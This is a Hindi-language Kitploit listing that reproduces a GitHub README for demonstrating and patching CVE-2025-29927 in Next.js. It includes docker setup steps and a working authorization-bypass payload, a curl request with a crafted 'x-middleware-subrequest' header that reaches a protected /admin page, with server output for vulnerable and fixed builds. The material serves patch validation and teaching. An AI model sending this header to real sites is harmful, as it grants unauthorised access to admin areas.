Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927 — CVE-2025-29927 भेद्यता का पुनरुत्पादन और समाधान। | Kitploit
उपकरण/GitHubGitHub/bongni/cve-2025-29927
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbongni/cve-2025-29927

CVE-2025-29927

CVE-2025-29927 भेद्यता का पुनरुत्पादन और समाधान।

रिपॉजिटरी देखें
1610 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927

CVE-2025-29927 भेद्यता का पुनरुत्पादन और सुधार।

git clone [email protected]:Bongni/CVE-2025-29927.git
cd CVE-2025-29927

vulnerable/ में एप्लिकेशन का एक संस्करण है जो हमले के प्रति संवेदनशील है। fixed/ में एप्लिकेशन का एक संस्करण है जो न्यूनतम संस्करण में अपग्रेड किया गया है जो भेद्यता को ठीक करता है।

⚠️ महत्वपूर्ण: ये उदाहरण डिफेंडरों, शोधकर्ताओं और पैचिंग को मान्य करने वाली टीमों के लिए प्रदान किए गए हैं। इन छवियों को सार्वजनिक या उत्पादन नेटवर्क पर न चलाएं। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जहां आपके पास स्पष्ट लिखित अनुमति है।

संवेदनशील संस्करण (Vulnerable version)

CVE-2025-29927 भेद्यता का पुनरुत्पादन।

डोकर कंटेनर बनाएं और प्रारंभ करें

cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln

एक्सप्लॉइट चलाएं

यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए

curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

फिर यह कमांड चलाएं, जो एडमिन पेज तक पहुंचने में सक्षम होना चाहिए

curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...

सुधारित संस्करण (Fixed version)

CVE-2025-29927 भेद्यता का सुधार।

डोकर कंटेनर बनाएं और प्रारंभ करें

cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed

एक्सप्लॉइट चलाएं

यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए

curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

फिर यह कमांड चलाएं, जिसे अब भी लॉगिन पेज पर रीडायरेक्ट होना चाहिए

curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

संदर्भ (References)

यह रिपॉजिटरी l1uk/nextjs-middleware-exploit पर आधारित है, लेकिन Next.js के संस्करण 15.x के लिए अनुकूलित किया गया है।

टूल डाउनलोड करें